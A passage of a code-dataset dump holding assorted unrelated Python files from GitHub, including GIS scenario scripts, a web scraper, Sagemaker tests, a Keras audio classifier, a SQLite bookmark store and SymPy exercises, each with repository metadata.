label\n# At the end, merges all constraint layers into a single scenario file, designed for input to Spatial Strategy Analysis.py\n# Starting layer should already contain text field called Scenario for labels\n# -----------------------------------------------------------------------------------------------------------------------\n\nimport time, arcpy, os, MyFunctions\n\nprint(''.join([\"## Started on : \", time.ctime()]))\n\narcpy.CheckOutExtension(\"Spatial\")\narcpy.env.overwriteOutput = True # Overwrites files\n\n# Define input parameters\n# -----------------------\ngdb = r\"D:\\cenv0389\\Oxon_GIS\\Oxon_county\\NaturalCapital\\Scenario_analysis.gdb\"\narcpy.env.workspace = gdb\nstart_layer = \"Halo1km\"\nstart_label = \"Halo1km\"\n# Threshold size: polygons smaller than this will be deleted\nthreshold_size = 500\nInfoTable = os.path.join(gdb, \"OP2050ScenariosDes\")\noutput = \"ScenariosDes\"\n\n# Get a list of constraint layer names and short labels from InfoTable\nconstraint_names = []\nconstraints = arcpy.da.SearchCursor(InfoTable, \"Name\")\nfor constraint in constraints:\n constraint_names.append(str(constraint[0]))\nconstraint_labels = []\nlabels = arcpy.da.SearchCursor(InfoTable, \"Label\")\nfor label in labels:\n constraint_labels.append(str(label[0]))\n\n# Successively erase constraints, beginning with start layer\ni = 0\nnew_layer = \"\"\nnew_label = start_label + \"_no\"\nmerge_layers = []\nfor constraint_name in constraint_names:\n i = i + 1\n if i == 1:\n in_layer = start_layer\n out_layer = start_layer + \"_no\" + constraint_labels[i-1]\n else:\n in_layer = new_layer\n out_layer = in_layer[:-8] + constraint_labels[i-1]\n print(\"Erasing \" + constraint_name + \" from \" + in_layer + \" to make \" + out_layer)\n arcpy.Erase_analysis(in_layer, constraint_name, out_layer)\n # Add new scenario label\n new_label = new_label + constraint_labels[i-1]\n print(\"Label is \" + new_label)\n arcpy.CalculateField_management(out_layer, \"Scenario\", \"'\" + new_label + \"'\", \"PYTHON_9.3\")\n\n # Convert to single part\n arcpy.MultipartToSinglepart_management(out_layer, out_layer + \"_sp\")\n # Delete fragments smaller than viable threshold size\n arcpy.MakeFeatureLayer_management(out_layer + \"_sp\", \"del_lyr\", \"Shape_Area < \" + str(threshold_size))\n arcpy.DeleteFeatures_management (\"del_lyr\")\n arcpy.Delete_management(\"del_lyr\")\n # Dissolve again\n arcpy.Dissolve_management(out_layer + \"_sp\", out_layer + \"_sp_diss\", \"Scenario\")\n new_layer = out_layer + \"_sp_diss\"\n merge_layers.append(new_layer)\n\nprint(\"Merging into single scenario file:\" + \"\\n\".join(merge_layers))\narcpy.CopyFeatures_management(start_layer, output)\narcpy.Append_management(merge_layers, output, \"NO_TEST\")\n\nprint(\"Finished on \" + time.ctime())\n\nexit()","repo_name":"nismod/natural-capital-mapping","sub_path":"Create_Scenarios.py","file_name":"Create_Scenarios.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"42207639957","text":"import os, node\ncolors = [\"green\", \"blue\", \"violet\", \"crimson\", \"alabaster\", \"orange\", \"aqua\", \"amaranth\", \"purple\", \"pink\", \"red\", \"amber\", \"bronze\", \"brown\", \"gold\", \"rose\", \"silver\", \"yellow\", \"amethyst\", \"white\", \"brass\", \"fuchsia\", \"ruby\", \"aquamarine\", \"lime\", \"gray\", \"auburn\", \"azure\", \"batorange\", \"beige\", \"black\", \"blond\", \"blood\", \"sapphire\", \"lavender\", \"lilac\", \"maroon\", \"turquoise\", \"rose\", \"burgundy\", \"cadet\", \"cerulean\", \"charcoal\", \"chartreuse\", \"copper\", \"coral\", \"cyan\", \"ebony\", \"ultramarine\", \"firebrick\", \"garnet\", \"ivory\", \"indigo\", \"jade\", \"khaki\", \"magenta\", \"mahogany\", \"mauve\", \"olive\", \"opal\", \"periwinkle\", \"scarlet\", \"sienna\", \"tan\", \"teal\", \"topaz\", \"umber\", \"vermillion\"]\n\nnodes = []\n\ndef openFolder(userF):\n files = []\n for root, dirs, filenames in os.walk(userF):\n files = filenames\n return files\n\ndef findColors(files, userF):\n for f in files:\n location = \"\"\n if f[len(f) - 1] != \"/\":\n location = userF + \"/\" + f\n else:\n location = userF + \"/\" + f\n\n fh = open(location, \"r\")\n\n fh = fh.read()\n fh = fh.replace('\\n', '')\n fh = fh.replace('\\r', '')\n fh = fh.replace('\\\\', '')\n fh = fh.replace('!', '.')\n fh = fh.replace('?', '.')\n sen = fh.split('. ')\n\n for s in sen:\n s = s.replace('.', '')\n tmp = s.split(' ')\n for word in tmp:\n new = True\n if word in colors:\n for each in nodes:\n if word in each:\n each[1].colorAgain(word, tmp)\n new = False\n if new:\n nodes.append([word, node.color(word, tmp)])\n\ndef main():\n userF = \"books/\"\n files = openFolder(userF)\n findColors(files, userF)\n for each in nodes:\n each[1].getColorLoc()\n\nmain()\n","repo_name":"ironsketch/theEmotionsofBooks","sub_path":"stuff/old/oldmain.py","file_name":"oldmain.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2909852335","text":"#!/usr/bin/python3\n''' List all State objects from the database hbtn_0e_6_usa '''\n\nimport sys\nfrom model_state import Base, State\nfrom sqlalchemy import (create_engine)\nfrom sqlalchemy.orm import sessionmaker\n\nif __name__ == \"__main__\":\n engine = create_engine('mysql+mysqldb://{}:{}@localhost/{}'\n .format(sys.argv[1], sys.argv[2], sys.argv[3]),\n pool_pre_ping=True)\n Session = sessionmaker(bind=engine)\n session = Session()\n result = session.query(State).filter(State.name == sys.argv[4])\n for i in result:\n print(\"{}\".format(i.id))\n if len(result.all()) == 0:\n print(\"Not found\")\n session.close()\n","repo_name":"josecaro02/holbertonschool-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/10-model_state_my_get.py","file_name":"10-model_state_my_get.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24254351416","text":"import socket\r\n\r\nfrom .worker import ThreadController, Worker\r\nfrom ai_company.core import logger\r\n\r\nclass AIServer:\r\n def __init__(self, host, port, handler_factory, multi_worker=False):\r\n self.host = host\r\n self.port = port\r\n self.multi_worker = multi_worker\r\n self.handler_factory = handler_factory\r\n self.thread_controller = None\r\n\r\n def run(self):\r\n listener = socket.socket()\r\n listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n listener.bind((self.host, self.port))\r\n listener.listen(10)\r\n logger.info(f\"准备接受远程连接,监听地址{self.host}:{self.port}\")\r\n try:\r\n if self.multi_worker:\r\n self.thread_controller = ThreadController()\r\n while True:\r\n conn, addr = listener.accept()\r\n self.thread_controller.create_work(addr, conn, self.handler_factory)\r\n else:\r\n conn, addr = listener.accept()\r\n worker = Worker(addr, conn, self.handler_factory)\r\n worker.work()\r\n except KeyboardInterrupt as e:\r\n logger.info(\"AIServer已被用户终止\")\r\n if self.thread_controller:\r\n self.thread_controller.request_stop()\r\n else:\r\n worker.stop()\r\n finally:\r\n logger.info(\"AIServer正在尝试退出,请耐心等待...\")\r\n listener.close()\r\n if self.thread_controller:\r\n self.thread_controller.join()\r\n\r\n\r\n","repo_name":"NorthenFleet/AI-DNA","sub_path":"core/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12807075182","text":"import requests as rq\nfrom lxml import *\nfrom bs4 import BeautifulSoup as bs\nlink = \"https://browser-info.ru/\"\nheaders = {\n\t\"User-Agent\" : \"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0\",\n}\nrequest = rq.get(link, headers=headers)\n\nif request.status_code == 200:\n\tprint(\"Я подключился!\")\nsoup = bs(request.text, \"lxml\")\nua = soup.find(\"div\", {\"id\":\"user_agent\"})\nprint(ua.text)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\ninput()\n\n\n\n\n'''\nhtml_doc = \"\"\"\nThe Dormouse's story\n\n

The Dormouse's story

\n\n
\n\t\n\t\n\t\t

i am very good boy!

\n\t\t

Hi Sam!

\n\t
\n\n
\n
\n\t
\n\t\t

Once upon a time there were three little sisters; and their names were\n\t\t\tElsie,\n\t\t\tLacie and\n\t\t\tTillie;\n\t\t\tand they lived at the bottom of a well.

\n\t\t

...

\n\t
\n
\n\"\"\"\n\n#soup = bs(html_doc, \"lxml\")\n\n#class_child = soup.find_all(\"h1\", class_=\"child\")\n#for item in class_child:\n#\tprint(item.text)\n\n#sam = soup.find(\"h1\", {\"id\":\"sam\"})\n#print(type(sam))\n\n#all_a = soup.find_all(\"a\")\n#for item in all_a:\n#\tprint(item.get(\"id\"))\n\n#parents_a = soup.find(\"a\").find_next()\n#print(parents_a)\n'''","repo_name":"amxr1338/projects","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25682456167","text":"# Generators are functions that return as sequence of values.\n#We use yield statement to return the value from function.\na=[12,14,14,41,43]\n\ndef disp(b):\n yield b\n\nresult =disp(a)\nprint(result)\nprint(type(result))\nfor i in result:\n print(i)\n\n\n","repo_name":"Suryalama/pylesson","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42817906915","text":"import os\nimport sys\ncurrentdir = os.path.dirname(os.path.realpath(__file__))\nparentdir = os.path.dirname(currentdir)\nsys.path.append(parentdir)\n\nfrom flask_app import *\n\nimport numpy as np\nimport boto3\nimport env\nimport cv2\nfrom PIL import Image\n\n\n# AWS SECRETS\nAWS_KEY = env.AWS_KEY\nAWS_SECRET = env.AWS_SECRET\n\n##############\n# UNIT TESTS #\n##############\n\n\ndef test_semantic_input_preprocess():\n \"\"\" Test the semantic input preprocess function\n \"\"\"\n pil_img = Image.open(\"one-line-test.png\")\n image = np.asarray(pil_img.convert('L'))\n assert(image is not None) # Check test image was read properly\n image_list, seq_lengths = semantic_input_preprocess(image)\n assert(type(image_list) == list) # Check output type\n assert(image_list is not None) # Check that the list not None\n assert(type(seq_lengths) == list)\n assert(len(seq_lengths) > 0) # Check calculating seq lengths\n print(\"Test semantic_input_preprocess passed!\")\n\n\ndef test_semantic_endpoint_pred():\n \"\"\" Test the semantic endpoint prediction API call and postprocessing\n \"\"\"\n pil_img = Image.open(\"one-line-test.png\")\n image = np.asarray(pil_img.convert('L'))\n assert(image is not None) # Check test image was read properly\n # Use separately tested function to generate test input\n input_image, seq_lengths = semantic_input_preprocess(image)\n # AWS Sagemaker client for API authorization\n client = boto3.client(\n 'sagemaker-runtime',\n region_name='us-east-1',\n aws_access_key_id=AWS_KEY,\n aws_secret_access_key=AWS_SECRET\n )\n data = semantic_endpoint_pred(client, \"semantic\", input_image, seq_lengths)\n assert(data is not None) # Check response is not empty\n assert(type(data) == dict) # Check data is correct type\n assert(data['outputs'] is not None) # Check data has tensor data\n print(\"Test semantic_endpoint_pred passed!\")\n\n\ndef test_parse_tensor_to_vocab_indices():\n \"\"\" Test the parsing of the semantic inference dictionary output\n \"\"\"\n pil_img = Image.open(\"one-line-test.png\")\n image = np.asarray(pil_img.convert('L'))\n assert(image is not None) # Check test image was read properly\n # Use separately tested function to generate test input\n input_image, seq_lengths = semantic_input_preprocess(image)\n # AWS Sagemaker client for API authorization\n client = boto3.client(\n 'sagemaker-runtime',\n region_name='us-east-1',\n aws_access_key_id=AWS_KEY,\n aws_secret_access_key=AWS_SECRET\n )\n # Generate test data from endpoint\n data = semantic_endpoint_pred(client, \"semantic\", input_image, seq_lengths)\n # Output to test\n vocab_indices = parse_tensor_to_vocab_indices(data, seq_lengths)\n assert(vocab_indices is not None) # Check that an output exists\n assert(type(vocab_indices) == list) # Check output is list\n assert(len(vocab_indices) > 0) # Check that some prediction exists\n assert(type(vocab_indices[0]) == int) # Check list is of type integer\n print(\"Test parse_tensor_to_vocab_indices passed!\")\n\n\ndef test_yolo_endpoint_pred():\n \"\"\" Test yolo endpoint Sagemaker API call function\n \"\"\"\n raw_im = cv2.imread(\"test.png\")\n assert(raw_im is not None) # Check test image was read properly\n # Preprocess image to bytes\n retval, buffer = cv2.imencode('.jpg', raw_im)\n bytes_jpg = base64.b64encode(buffer)\n assert(type(bytes_jpg) == bytes) # Check request body is bytes\n # AWS Sagemaker client for API authorization\n client = boto3.client(\n 'sagemaker-runtime',\n region_name='us-east-1',\n aws_access_key_id=AWS_KEY,\n aws_secret_access_key=AWS_SECRET\n )\n preds = yolo_endpoint_pred(client, 'yolov5', 'image/jpeg', bytes_jpg)\n assert(preds is not None) # Check response body not None\n assert(type(preds) == list) # Check nonempty response is list\n if(len(preds) > 0):\n # Check type and structure of output dictionary\n assert(type(preds[0]) == dict)\n assert(type(preds[0]['label']) == int)\n assert(type(preds[0]['x']) == float)\n assert(type(preds[0]['y']) == float)\n assert(type(preds[0]['width']) == float)\n assert(type(preds[0]['height']) == float)\n assert(type(preds[0]['conf']) == float)\n if(len(preds) > 1): # Check if list is sorted\n assert(preds[0]['y'] < preds[1]['y'])\n print(\"Test yolo_endpoint_pred passed!\")\n\n\ndef test_split_to_lines():\n \"\"\" Test image splitting from prediction dictionary\n \"\"\"\n filename = \"test.png\" # Filename for input to tested function\n\n # Format image input to get preds\n raw_im = cv2.imread(filename)\n assert(raw_im is not None) # Check test image was read properly\n # Preprocess image to bytes\n retval, buffer = cv2.imencode('.jpg', raw_im)\n bytes_jpg = base64.b64encode(buffer)\n assert(type(bytes_jpg) == bytes) # Check request body is bytes\n # AWS Sagemaker client for API authorization\n client = boto3.client(\n 'sagemaker-runtime',\n region_name='us-east-1',\n aws_access_key_id=AWS_KEY,\n aws_secret_access_key=AWS_SECRET\n )\n # Get sample preds from separately tested yolo_endpoint_pred function\n preds = yolo_endpoint_pred(client, 'yolov5', 'image/jpeg', bytes_jpg)\n # Tested output\n split_images = split_to_lines(filename, preds)\n assert(split_images is not None) # Check output not empty\n assert(type(split_images) == list)\n # If there are lines that are split, check image data type\n if(len(split_images) > 0):\n assert(type(split_images[0]) == np.ndarray)\n print(\"Test split_to_lines passed!\")\n\n# RUN TESTS\ntest_semantic_input_preprocess()\ntest_semantic_endpoint_pred()\ntest_parse_tensor_to_vocab_indices()\ntest_yolo_endpoint_pred()\ntest_split_to_lines()\n","repo_name":"SheetMusic-Team-3/sheet-music-plus-plus","sub_path":"testing/flask_app_tests.py","file_name":"flask_app_tests.py","file_ext":"py","file_size_in_byte":5823,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19965280807","text":"\nimport os\n\nimport pandas as pd\nimport numpy as np\n\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nimport librosa\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn import metrics\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom keras.layers import Convolution1D, Convolution2D, MaxPooling2D\nfrom keras.optimizers import Adam\nfrom keras.utils import np_utils\n\n\nclass Processor():\n def __init__(self, data):\n\n self.settings = data\n self.data_dir = data['data_dir']\n self.train_csv = data['train_csv']\n self.pickle_train = data['pickle_train']\n self.pickle_test = data['pickle_test']\n self.test_csv = data['test_csv']\n self.test_size = data['test_size']\n self.random_state = data['random_state']\n self.plt_figsize = data['plt_figsize']\n self.n_mfcc = data['librosa_n_mfcc']\n self.res_type = data['librosa_res_type']\n self.num_epochs = data['keras_num_epochs']\n self.loss_var = data['keras_loss']\n self.metrics = data['keras_metrics']\n self.optimizer = data['keras_optimizer']\n self.shuffle = data['keras_shuffle']\n self.verbose = data['keras_verbose']\n self.filter_size = data['keras_filter_size']\n\n self.X_train = None\n self.X_test = None\n self.y_train = None\n self.y_test = None\n self.train_df = None\n self.test_df = None\n self.history = None\n self.acc = None\n self.val_acc = None\n self.loss = None\n self.val_loss = None\n\n self.lb = None\n self.predictions = None\n\n def process_training(self):\n if os.path.isfile(self.pickle_train):\n print('Loading from pickle, {}'.format(self.pickle_train))\n self.train_df = pd.read_pickle(self.pickle_train)\n else:\n train = pd.read_csv(self.data_dir + self.train_csv)\n\n self.train_df = pd.DataFrame(train.apply(self.train_parser, axis=1))\n self.train_df.rename(columns={0:'Features'}, inplace=True)\n self.train_df['Label'] = self.train_df['Features'].map(lambda x: x[1])\n self.train_df['Features'] = self.train_df['Features'].map(lambda x: x[0])\n self.train_df.to_pickle(self.pickle_train)\n\n target = self.train_df['Label']\n features = self.train_df.drop('Label', axis=1)\n\n self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(features, target, test_size=self.test_size, random_state=self.random_state)\n\n\n def train_parser(self, row):\n # function to load files and extract features\n file_name = os.path.join(os.path.abspath(self.data_dir), 'Train', str(row.ID) + '.wav')\n # handle exception to check if there isn't a file which is corrupted\n try:\n # # here kaiser_fast is a technique used for faster extraction\n X, sample_rate = librosa.load(file_name, res_type=self.res_type)\n # # we extract mfcc feature from data\n mfccs = np.mean(librosa.feature.mfcc(y=X, sr=sample_rate, n_mfcc=self.n_mfcc).T,axis=0)\n except Exception as e:\n print(\"Error encountered while parsing file: \", file_name)\n return None\n\n feature = mfccs\n label = row.Class\n\n return [feature, label]\n\n def test_parser(self, row):\n # function to load files and extract features\n file_name = os.path.join(os.path.abspath(self.data_dir), 'Test', str(row.ID) + '.wav')\n # handle exception to check if there isn't a file which is corrupted\n try:\n # # here kaiser_fast is a technique used for faster extraction\n X, sample_rate = librosa.load(file_name, res_type=self.res_type)\n # # we extract mfcc feature from data\n mfccs = np.mean(librosa.feature.mfcc(y=X, sr=sample_rate, n_mfcc=self.n_mfcc).T,axis=0)\n except Exception as e:\n print(\"Error encountered while parsing file: \", file_name)\n return None\n\n return [mfccs, row.ID]\n\n def prep_x_test(self):\n if os.path.isfile(self.pickle_test):\n print('Loading from pickle, {}'.format(self.pickle_test))\n self.test_df = pd.read_pickle(self.pickle_test)\n else:\n test = pd.read_csv(self.data_dir + self.test_csv)\n self.test_df = pd.DataFrame(test.apply(self.test_parser, axis=1))\n # self.test_df.rename(columns={0:'Features'}, inplace=True)\n self.test_df.rename(columns={0:'Features'}, inplace=True)\n self.test_df['ID'] = self.test_df['Features'].map(lambda x: x[1])\n self.test_df['Features'] = self.test_df['Features'].map(lambda x: x[0])\n self.test_df.to_pickle(self.pickle_test)\n\n\n\n def show_accuracy(self):\n plt.figure(figsize=self.plt_figsize)\n acc = list(self.history.history['acc'])\n val_acc = list(self.history.history['val_acc'])\n plt.plot(acc)\n plt.plot(val_acc)\n plt.title('model_accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='best')\n plt.savefig('output/accuracy.png')\n plt.show()\n\n def show_loss(self):\n plt.figure(figsize=self.plt_figsize)\n loss = list(self.history.history['loss'])\n val_loss = list(self.history.history['val_loss'])\n plt.plot(loss)\n plt.plot(val_loss)\n plt.title('model_loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='best')\n plt.savefig('output/loss.png')\n plt.show()\n\n def predict (self):\n X_predict = np.array(self.test_df.Features.tolist())\n predictions = self.model.predict_classes(X_predict)\n self.test_df['prediction_number'] = predictions\n self.test_df['prediction_label'] = self.lb.inverse_transform(predictions)\n\n\n def run(self, num_epochs):\n\n X_train = np.array(self.X_train.Features.tolist())\n y_train = np.array(self.y_train.tolist())\n\n X_test = np.array(self.X_test.Features.tolist())\n y_test = np.array(self.y_test.tolist())\n\n lb = LabelEncoder()\n self.lb = lb\n\n y_train = np_utils.to_categorical(lb.fit_transform(y_train))\n y_test = np_utils.to_categorical(lb.fit_transform(y_test))\n\n num_labels = y_train.shape[1]\n filter_size = self.filter_size\n model = Sequential()\n model.add(Dense(256, input_shape=(self.n_mfcc,)))\n model.add(Activation('relu'))\n model.add(Dropout(0.5))\n\n model.add(Dense(256))\n model.add(Activation('relu'))\n model.add(Dropout(0.5))\n\n model.add(Dense(num_labels))\n model.add(Activation('softmax'))\n\n model.compile(loss='categorical_crossentropy', metrics=['accuracy'], optimizer='adam')\n\n self.history = model.fit(X_train, y_train, epochs=num_epochs, validation_data=(X_test, y_test), shuffle=False, verbose=0)\n self.model = model\n return True\n","repo_name":"davidhaase/audio-classification","sub_path":"audioprocessor.py","file_name":"audioprocessor.py","file_ext":"py","file_size_in_byte":7117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8538790267","text":"import os\nimport re\nimport json\nimport logging\nfrom openpyxl import load_workbook\nfrom utils import util_logger\n\nloger_name = os.path.basename(__file__).split(\".\")[0]\nutil_logger.set_logger_config(loger_name)\nlogger = logging.getLogger(loger_name)\n\nfile_path = \"D:\\\\CodeOkay\\\\tuling-tool\\\\data\\\\xlsx\\\\英语单词.xlsx\"\nsheet_name = \"英文单词\"\ncol = 2\n\nbegin_row = 1\nend_row = 1000\n\n\ndef load_data():\n wb = load_workbook(file_path)\n ws = wb[sheet_name]\n rows = ws[begin_row:end_row]\n for idx, row in enumerate(rows):\n if row[col-1]:\n row_num = idx+begin_row\n val = row[col-1].value\n try:\n insert_db(row_num, val)\n except Exception as e:\n logger.error(f\"写入数据失败. row_num: {row_num}, {e}\")\n\n\ndef insert_db(row_num, val):\n logger.info(f\"开始写入数据 row_num: {row_num}\")\n\n val_dict = json.loads(val)\n info = val_dict.get(\"nlpResponse\", {}).get(\"intent\", {}).get(\"parameters\", {}).get(\"result\", {}).get(\"info\", {})\n if info:\n explanations = info.get(\"explanations\", [])\n explanations_dict = {}\n for explanation in explanations:\n if explanation[\"pos\"] in explanations_dict:\n explanations_dict[explanation[\"pos\"]] += f\";{explanation['meaning']}\"\n else:\n explanations_dict[explanation[\"pos\"]] = explanation['meaning']\n\n word = {\n \"word\": info.get(\"word\", \"\"),\n \"phonetic_en\": info.get(\"phoneticEn\", \"\"),\n \"phonetic_us\": info.get(\"phoneticUs\", \"\"),\n \"explanations\": json.dumps(explanations_dict),\n \"word_audio\": info.get(\"wordAudio\", \"\"),\n \"phonetic_en_audio\": info.get(\"phoneticEnAudio\", \"\"),\n \"phonetic_us_audio\": info.get(\"phoneticUsAudio\", \"\"),\n \"noun_plurals\": info.get(\"nounPlurals\", \"\"),\n \"verb\": info.get(\"verb\", \"\"),\n \"third_singular\": info.get(\"thirdSingular\", \"\"),\n \"preterit\": info.get(\"preterit\", \"\"),\n \"present_participle\": info.get(\"presentParticiple\", \"\"),\n \"past_participle\": info.get(\"pastParticiple\", \"\"),\n \"adjective\": info.get(\"adjective\", \"\"),\n \"comparative_degree\": info.get(\"comparativeDegree\", \"\"),\n \"superlative_degree\": info.get(\"superlativeDegree\", \"\"),\n \"word_status\": 1\n }\n word_args = list(word.values())\n word_id = 000000\n\n examples = info.get(\"examples\", [])\n example_args = []\n for example in examples:\n example_args.append([word_id, example[\"en\"], example[\"cn\"]])\n\n logger.info(f\"结束写入数据 row_num: {row_num}\")\n\n\nSQL_INSERT_EN_WORD = \"\"\"\n\n\"\"\"\n\nSQL_INSERT_EN_WORD_EXAMPLE = \"\"\"\n\n\"\"\"\n","repo_name":"SanfordLuo/tool-demos","sub_path":"tuling-tool/insert_en_word.py","file_name":"insert_en_word.py","file_ext":"py","file_size_in_byte":2769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40261365886","text":"import json\n\ndef read_jsonl_file(filename):\n return [json.loads(line) for line in open(filename, \"r\")]\n\ndef write_jsonl_file(data, filename):\n with open(filename, \"w\") as fw:\n for d in data:\n fw.write(json.dumps(d, ensure_ascii=False) + \"\\n\")\n\nif __name__ == \"__main__\":\n src = 'data/proposal.jsonl'\n tgt = 'data/result/result.txt'\n\n src_data = read_jsonl_file(src)\n\n with open(tgt, 'r') as t:\n tgt_data = t.readlines()\n summ = {}\n for i in range(100):\n summ[i] = []\n\n for s, t in zip(src_data, tgt_data):\n id = s['id']\n \n t = t.strip('\\n')\n summ[id].append(t)\n\n f_write = 'data/test.jsonl'\n data_todo = read_jsonl_file(f_write)\n\n for i in range(len(data_todo)):\n data_todo[i]['summary'] = summ[i]\n \n f = 'data/result/result.jsonl'\n write_jsonl_file(data_todo, f)\n\n","repo_name":"Aliciaa-svg/NLP-Project","sub_path":"process_test_result.py","file_name":"process_test_result.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"44332847555","text":"import logging\nimport sqlite3\n\n\nlogger = logging.getLogger()\n\nBOOKMARKS_TABLE = \"bookmarks\"\n\n\ndef sql_escape(text):\n if not text:\n return text\n return text.replace(\"'\", \"''\")\n\n\nclass Sqlite:\n def __init__(self, db_filename):\n self.db_filename = db_filename\n logger.info(\"DB filename = %s\", self.db_filename)\n\n self._create_tables_if_not_exists()\n\n def _connect(self):\n conn = sqlite3.connect(self.db_filename)\n return conn, conn.cursor()\n\n @classmethod\n def _close(cls, conn):\n conn.commit()\n conn.close()\n\n def _create_tables_if_not_exists(self):\n conn, cursor = self._connect()\n bookmarks_table = \\\n f\"CREATE TABLE IF NOT EXISTS {BOOKMARKS_TABLE} (\" \\\n \"id integer PRIMARY KEY,\" \\\n \"title text NOT NULL,\" \\\n \"description text,\" \\\n \"url text NOT NULL,\" \\\n \"section text\" \\\n \");\"\n cursor.execute(bookmarks_table)\n Sqlite._close(conn)\n\n def read_all_bookmarks(self):\n \"\"\"\n description (optional field) should be None if missing from the db.\n\n Returns:\n list of dict (each dict is a record from the db)\n \"\"\"\n conn, cursor = self._connect()\n bookmarks = []\n\n try:\n records = cursor.execute(f\"SELECT * FROM {BOOKMARKS_TABLE};\")\n except Exception as e:\n Sqlite._close(conn)\n raise e\n\n for record in records:\n # check if description is not empty and not None\n # (in sqlite, missing field is returned as \"None\" string)\n description = None\n if record[2] and record[2] != \"None\":\n description = record[2]\n\n bookmarks.append(\n {\n \"id\": record[0],\n \"title\": record[1],\n \"description\": description,\n \"url\": record[3],\n \"section\": record[4],\n }\n )\n Sqlite._close(conn)\n return bookmarks\n\n def add_bookmark(self, title, description, url, section):\n conn, cursor = self._connect()\n try:\n cursor.execute(f\"INSERT INTO {BOOKMARKS_TABLE} (title, description, url, section) \"\n f\"VALUES ('{sql_escape(title)}', \"\n f\"'{sql_escape(description)}', \"\n f\"'{sql_escape(url)}', \"\n f\"'{sql_escape(section)}');\")\n finally:\n Sqlite._close(conn)\n\n def delete_bookmark(self, bookmark_id):\n \"\"\"\n Args:\n bookmark_id (int): no need to escapse\n \"\"\"\n rows_deleted = 0\n conn, cursor = self._connect()\n try:\n cursor.execute(f\"DELETE FROM {BOOKMARKS_TABLE} WHERE id=?;\", (bookmark_id, ))\n rows_deleted = cursor.rowcount\n finally:\n Sqlite._close(conn)\n return rows_deleted == 1\n","repo_name":"eranfrie/Bookmarker","sub_path":"src/data/sqlite.py","file_name":"sqlite.py","file_ext":"py","file_size_in_byte":3002,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"22571172622","text":"def cells():\n '''\n # 2/ Exercise solutions\n '''\n\n '''\n '''\n\n # setup SymPy\n from sympy import *\n x, y, z, t = symbols('x y z t')\n init_printing()\n\n '''\n '''\n\n\n '''\n '''\n\n '''\n ## Definitions\n '''\n\n '''\n '''\n\n '''\n ### E2.1\n \n Find the inverse matrix $A^{-1}$ for the matrix $A=\\begin{bsmallmatrix}7 & 0 \\\\ 0 & 2\\end{bsmallmatrix}$. Verify that $A^{-1}(A\\vec{v})=\\vec{v}$ for any vector $\\vec{v} = \\begin{bsmallmatrix} v_1 \\\\ v_2\\end{bsmallmatrix}$. \n \n #### Answer\n $A^{-1} = \\begin{bsmallmatrix}\\frac{1}{7} & 0 \\\\ 0 & \\frac{1}{2}\\end{bsmallmatrix}$.\n \n #### Solution\n To find $A^{-1}$ we must consider the action of $A=\\begin{bsmallmatrix}7 & 0 \\\\ 0 & 2\\end{bsmallmatrix}$ on an arbitrary vector $\\vec{v}=\\begin{bsmallmatrix}v_1 \\\\ v_2\\end{bsmallmatrix}$, and perform the inverse action. Since $A$ multiplies the first component by $7$, $A^{-1}$ must divide the first component by $7$. Since $A$ multiplies the second component by $2$, $A^{-1}$ must divide the second component by $2$. Thus $A^{-1} = \\begin{bsmallmatrix}\\frac{1}{7} & 0 \\\\ 0 & \\frac{1}{2}\\end{bsmallmatrix}$. \n '''\n\n '''\n '''\n\n A = ...\n\n '''\n '''\n\n\n '''\n '''\n\n '''\n ### E2.2\n '''\n\n '''\n '''\n\n '''\n Given the matrices $A=\\begin{bsmallmatrix}1 & 3 \\\\ 4 & 5\\end{bsmallmatrix}$ and $B=\\begin{bsmallmatrix} -1 & 0 \\\\ 3 & 3 \\end{bsmallmatrix}$, and the vectors $\\vec{v}=\\begin{bsmallmatrix}1 \\\\ 2\\end{bsmallmatrix}$ and $\\vec{w}=\\begin{bsmallmatrix}-3 \\\\ -4\\end{bsmallmatrix}$, compute the following expressions. \n \n \n - a) $A\\vec{v}$\n - b) $B\\vec{v}$\n - c) $A(B\\vec{v})$\n - d) $B(A\\vec{v})$\n - e) $A\\vec{w}$\n - f) $B\\vec{w}$\n '''\n\n '''\n '''\n\n # define the matrices A and B, and the vecs v and w\n A = Matrix([[1,3], # 2x2 matrix A\n [4,5]])\n B = Matrix([[-1,0], # 2x2 matrix B\n [ 3,3]])\n v = Matrix([1,2]) # 2x1 